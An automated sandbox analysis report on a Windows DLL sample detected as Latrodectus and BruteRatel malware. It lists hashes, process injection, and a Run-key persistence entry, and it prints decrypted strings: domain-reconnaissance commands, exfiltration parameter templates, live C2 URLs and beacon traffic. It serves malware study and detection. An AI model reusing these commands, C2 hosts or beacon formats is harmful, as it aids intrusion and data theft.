Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name: upfilles.dll.dll (renamed file extension from exe to dll)
Original sample name: upfilles.dll.exe
Analysis ID: 1439879
MD5: ccb6d3cb020f56758622911ddd2f1fcb
SHA1: 4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256: f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags: exe

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6632 cmdline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5472 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 6688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6324 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 3732 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7264 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7272 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7272 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7396 cmdline: C:\Windows\system32\WerFault.exe -u -p 7288 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7296 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7320 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7856 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 7984 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel is a Customized Command and Control Center for Red Team and Adversary Simulation. SMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more. Built-in debugger to detect EDR userland hooks. Ability to keep memory artifacts hidden from EDRs and AV. Direct Windows SYS calls on the fly.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111
{"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
Yara matches (memory dumps):
Source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
Source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_BruteRatel_1; Description: Yara detected BruteRatel; Author: Joe Security
Source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_BruteRatel_1; Description: Yara detected BruteRatel; Author: Joe Security
Source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_BruteRatel_1; Description: Yara detected BruteRatel; Author: Joe Security
Source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_BruteRatel_1; Description: Yara detected BruteRatel; Author: Joe Security
(table truncated in this view; 35 entries in the full report)

Yara matches (unpacked PE files):
Source: 18.3.rundll32.exe.7df4f0220000.0.unpack; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
Source: 22.0.explorer.exe.13a0000.0.unpack; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
Source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
Source: 22.0.explorer.exe.13a0000.0.raw.unpack; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
Source: 22.2.explorer.exe.13a0000.0.unpack; Rule: JoeSecurity_Latrodectus; Description: Yara detected Latrodectus; Author: Joe Security
(table truncated in this view; 4 entries in the full report)

System Summary

Sigma match: Process started; Author: elhoim, CD_ROM_; Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7320, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
Sigma match: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: rundll32 "C:\Users\user\AppData\Roaming\upfilles.dll", stow...`.U. `.....#..p..8.. `......., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update
No Snort rule has matched

AV Detection

[22.0.explorer.exe.13a0000.0.unpack] Malware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
[upfilles.dll.dll] ReversingLabs: Detection: 15%
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c ipconfig /all
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c systeminfo
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c nltest /domain_trusts
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c net view /all /domain
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c nltest /domain_trusts /all_trusts
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c net view /all
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &ipconfig=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c net group "Domain Admins" /domain
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\wbem\wmic.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c net config workstation
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /c whoami /groups
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\Windows\System32\cmd.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &systeminfo=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &domain_trusts=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &domain_trusts_all=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &net_view_all_domain=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &net_view_all=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &net_group=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &wmic=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &net_config_ws=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &net_wmic_av=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &whoami_group=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "pid":
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "%d",
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "proc":
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "%s",
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "subproc": [
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &proclist=[
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "pid":
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "%d",
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "proc":
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "%s",
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "subproc": [
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &desklinks=[
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: *.*
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: "%s"
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Update_%x
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Custom_update
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: .dll
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: .exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: runnung
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: /files/
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Electrol
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: .+`lgSRHYJPpU\IETT05?=CAI
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: POST
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: GET
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: curl/7.88.1
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: p:
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: URLS
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: COMMAND
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: ERROR
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: sZp
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: @-
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: <html>
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: <!DOCTYPE
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %s%d.dll
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: 12345
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &stiller=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %s%d.exe
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: LogonTrigger
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %x%x
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: TimeTrigger
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: PT0H%02dM
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &mac=
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %02x
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: :%02x
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: PT0S
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &computername=%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: &domain=%s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: \*.dll
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %04X%04X%04X%04X%08X%04X
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: %04X%04X%04X%04X%08X%04X
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: https://workspacin.cloud/live/
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: https://illoskanawer.com/live/
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: AppData
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Desktop
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Startup
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Personal
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Local AppData
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[22.0.explorer.exe.13a0000.0.unpack] String decryptor: \update_data.dat
[unknown] HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
[unknown] HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
[unknown] HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
[unknown] HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
[unknown] HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
[unknown] HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
[unknown] HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
[Binary string] X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
[C:\Windows\System32\rundll32.exe] Code function: 6_2_00000001800192B8 FindFirstFileExW,6_2_00000001800192B8
[C:\Windows\explorer.exe] Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,22_2_013A8BA8
[C:\Windows\explorer.exe] Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,22_2_013A1A08
[C:\Windows\explorer.exe] Code function: 22_2_013ADCE0 FindFirstFileW,22_2_013ADCE0

Networking

                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 138.124.183.215 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.69.236.35 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.194.11.183 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 54.175.181.104 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 95.164.68.73 443Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.155 443Jump to behavior
                      Source: Malware configuration extractorURLs: https://workspacin.cloud/live/
                      Source: Malware configuration extractorURLs: https://illoskanawer.com/live/
                      Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                      Source: Joe Sandbox ViewASN Name: NOKIA-ASFI NOKIA-ASFI
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: HQservCommunicationSolutionsIL HQservCommunicationSolutionsIL
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 656Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 444Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
